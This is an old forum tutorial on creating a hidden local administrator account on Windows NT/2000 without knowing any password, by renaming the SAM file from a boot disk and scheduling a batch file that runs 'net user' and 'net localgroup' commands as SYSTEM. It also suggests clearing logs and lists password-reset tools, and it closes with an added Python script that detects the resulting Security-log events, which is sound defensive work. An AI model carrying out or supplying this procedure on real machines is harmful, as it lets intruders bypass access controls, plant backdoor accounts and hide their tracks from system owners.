May 10th, 2007, 09:18 AM
#1
How to create an Administrative Account without being an Administrator
This is my first howto/tutorial, so if there are any suggestions of any kind or questions, please let me know.
Next time you're faced with an NT or 2k system that you need to log on to
with an administrative account and nobody knows the passwords, do the
following 12 steps to create a new account while preserving the existing
account profiles.
1) boot to a windows boot disk
2) if the C drive is NTFS use ntfsdos to mount it
3) maneuver to c:\winnt\system32\config
4) rename the SAM. file to anything you want
5) reboot and login as 'administrator' and a blank password
At this point you have administrative access, but any changes you make to
the profiles will not be saved to the proper SAM file and will be lost.
All other changes (configurations, installations, etc) made at this point
will be saved.
6) open notepad
7) type the following three lines:
@echo off
net user newuser mypass /ADD
net localgroup /ADD administrators newuser
8) save as c:\useradd.bat
9) open a command prompt and type
at <enter a time 10 minutes or so into the future> "c:\useradd.bat"
10) reboot to your floppy
11) delete the c:\winnt\system32\config\SAM. file and rename the old one
back to SAM.
12) reboot and wait 10-15 minutes for the batch file to execute. The batch file will execute with system privileges and create the 'newuser' account and add it to the administrators group.
You can then log on with your newuser account with local administrative rights and can reset the original administrator account, clear the logs or do whatever it is you need to.
Unfortunately, the only way to defend against something like this in the wild is to ensure you have proper auditing and hope whoever it is doesn't run through your security log and edit out the appropriate entries.
There are now several new tools out there to assist you in recovering/changing passwords:
http://www.loginrecovery.com/
Login Recovery is a service to reveal user names and recover passwords for Windows NT, 2000, XP, 2003 and Vista. As long as you have physical access to the computer, your passwords can be recovered.
http://ebcd.pcministry.com/
Change the password of any user, including the administrator, of Windows NT/2000/XP. You do not need to know the old password.
http://trinityhome.org/Home/index.ph...=1&front_id=12
Here's a summary of some of the most important features, new and old:
-easily reset Windows passwords
-4 different virus-scan products integrated in a single uniform command line with online update capability
-full ntfs write support thanks to ntfs-3g (all other drivers included as well)
-clone NTFS filesystems over the network
-wide range of hardware support (kernel 2.6.19.1 and recent kudzu hwdata)
-easy script to find all local filesystems
http://www.ubcd4win.com/contents.htm
(Re)set the passwords of any user that has a valid local account, create a new local user with administrator rights, and grant administrator rights to an existing user on your NT system.
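Picking up the auditing point made above: as an added example (not part of the original post or of any tool it lists), a short Python pass over exported Security-log records that flags the traces the 12 steps leave behind. The event IDs are the standard Security-log values for the two numbering schemes; the record layout and sample records are constructed for the demo.

```python
# Added detection example, not from the original post. It scans exported
# Security-log records for the traces the procedure above leaves: an account
# created with no interactive caller (an 'at' job runs as SYSTEM), that account
# joining Administrators, and the audit log being cleared afterwards.
# Event IDs: 624/4720 user created, 636/4732 member added to a local group,
# 517/1102 audit log cleared (NT-2003 / Vista+ numbering). Samples are constructed.
from dataclasses import dataclass
from typing import List

USER_CREATED = {624, 4720}
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}
AUDIT_LOG_CLEARED = {517, 1102}
SYSTEM_CONTEXTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}

@dataclass
class Event:
    event_id: int
    subject: str       # account that performed the action (caller)
    target: str = ""   # account created, or group modified
    member: str = ""   # member added, for group-change events

def review(events: List[Event]) -> List[str]:
    """Return one finding per suspicious record; an empty list means nothing flagged."""
    findings = []
    created_by_system = set()
    for e in events:
        if e.event_id in USER_CREATED and e.subject.upper() in SYSTEM_CONTEXTS:
            created_by_system.add(e.target.lower())
            findings.append(f"account '{e.target}' created under {e.subject}, no interactive caller")
        elif e.event_id in LOCAL_GROUP_MEMBER_ADDED and e.target.lower() == "administrators":
            if e.member.lower() in created_by_system or e.subject.upper() in SYSTEM_CONTEXTS:
                findings.append(f"'{e.member}' added to Administrators by {e.subject}")
        elif e.event_id in AUDIT_LOG_CLEARED:
            findings.append(f"security log cleared by {e.subject}")
    return findings

# Constructed sample: the sequence a scheduled useradd.bat would produce,
# mixed with ordinary helpdesk activity that must not be flagged.
SAMPLE_EVENTS = [
    Event(624, "SYSTEM", "newuser"),
    Event(636, "SYSTEM", "Administrators", "newuser"),
    Event(624, "helpdesk", "jsmith"),
    Event(636, "helpdesk", "Users", "jsmith"),
    Event(517, "newuser"),
]

if __name__ == "__main__":
    for line in review(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Legitimate installers also create service accounts under SYSTEM, so treat a hit as a hunting lead and correlate it with a scheduled-job entry and a maintenance window rather than as a verdict. The log-cleared event is the one trace the attacker cannot remove from the new log, which is why it is worth forwarding Security events off the box.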